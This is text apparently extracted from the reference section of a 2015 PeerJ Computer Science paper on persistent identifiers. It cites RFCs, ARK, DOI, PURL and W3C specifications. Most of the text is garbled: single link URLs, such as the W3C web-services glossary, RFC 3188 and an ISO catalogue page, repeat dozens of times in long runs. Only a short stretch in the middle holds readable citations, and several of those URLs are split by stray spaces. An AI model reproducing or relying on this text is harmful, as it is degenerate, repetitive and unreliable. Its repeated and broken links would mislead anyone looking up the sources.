http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 https://tools.ietf.org/html/rfc3188 http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf http://xml.coverpages.org/ECPA-PersistentIdentifiers.pdf https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt https://www.ietf.org/rfc/rfc2295.txt http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://vso1.nascom.nasa.gov/rdap/RDAP2012_landingpages_handout.pdf http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://www.doi.org/hb.html http://dx.doi.org/10.1371/journal.pmed.0020124 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=53798 http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://www.w3.org/TR/webarch/#identification http://dx.doi.org/10.7717/peerj-cs.1 Janée G, Kunze J, Starr J. 2009. Identifiers made easy. Available at http://ezid.cdlib.org/. Juty N, Le Novére N, Laibe C. 2012. Identifiers.org and MIRIAM registry: community resources to provide persistent identification. Nucleic Acids Research 40(D1):D580–D586 DOI 10.1093/nar/gkr1097. Klyne G, Newman C. 2002. RFC3339: date and time on the internet: timestamps. Available at http: //www.ietf.org/rfc/rfc3339.txt. Kunze J. 2003. Towards electronic persistence using ARK identifiers. In: Proceedings of the 3rd ECDL workshop on web archives. Trondheim, Norway, Available at https://confluence.ucop.edu/ download/attachments/16744455/arkcdl.pdf. Kunze J. 2012. The ARK identifier scheme at ten years old. In: Workshop on metadata and persistent identifiers for social and economic data, Berlin. Available at http://www.slideshare.net/jakkbl/ the-ark-identifier-scheme-at-ten-years-old. Kunze J, Rodgers R. 2013. The ARK identifier scheme. Technical report. Internet Engineering Task Force. Available at https://tools.ietf.org/html/draft-kunze-ark-18. Kunze J, Starr J. 2006. ARK (archival resource key) identifiers. Available at http://www.cdlib.org/ inside/diglib/ark/arkcdl.pdf. Lagoze C, Van de Sompel H. 2007. Compound information objects: the OAI-ORE perspective. Open Archives Initiative – Object Reuse and Exchange. Available at http://www.openarchives. org/ore/documents/CompoundObjects-200705.html. Lagoze C, Van de Sompel H, Johnston P, Nelson M, Sanderson R, Warner S. 2008. ORE user guide—resource map discovery. Available at http://www.openarchives.org/ore/1.0/discovery. Library of Congress. 1997. The relationship between URNs, Handles, and PURLs. Available at http://memory.loc.gov/ammem/award/docs/PURL-handle.html. Mali F, Erickson J, Archer P. 2014. Data catalog vocabulary (dcat): W3C recommendation 16 January 2014. Available at http://www.w3.org/TR/vocab-dcat/. Maunsell JH. 2014. Unique identifiers for authors. The Journal of Neuroscience 34(21):7043 DOI 10.1523/JNEUROSCI.1670-14.2014. Moats R. 1997. RFC2141: uniform resource name syntax. Available at https://tools.ietf.org/html/ rfc2141. National Center for Biotechnology Information. 2014. Available at http://jats.nlm.nih.gov/ publishing/tag-library/1.1d2/index.html. Nottingham M. 2010. RFC5988: web linking. Available at https://www.ietf.org/rfc/rfc5988.txt. OCLC. 2015. Purl help. Available at https://purl.org/docs/help.html (accessed 2 January 2015). Parsons MA, Duerr R, Minster J-B. 2010. Data citation and peer review. Available at http://dx.doi. org/10.1029/2010EO340001. Peterson D, Gao S, Malhotra A, Sperberg-McQueen CM, Thompson HS. 2012. W3C XML schema definition language (XSD) 1.1 part 2: datatypes: W3C recommendation 5 April 2012. Available at http://www.w3.org/TR/xmlschema11-1/. Peyrard S, Kunze J, Tramoni J-P. 2014. The ARK identifier scheme: lessons learnt at the BNF. In: Proceedings of the international conference on Dublin core and metadata applications 2014. Available at http://dcpapers.dublincore.org/pubs/article/view/3704/1927. Prinz F, Schlange T, Asadullah K. 2011. Believe it or not: how much can we rely on published data on potential drug targets? Nature Reviews Drug Discovery 10(9):712–713 DOI 10.1038/nrd3439-c1. Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 21/22 https://peerj.com/computer-science/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://ezid.cdlib.org/ http://dx.doi.org/10.1093/nar/gkr1097 http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt 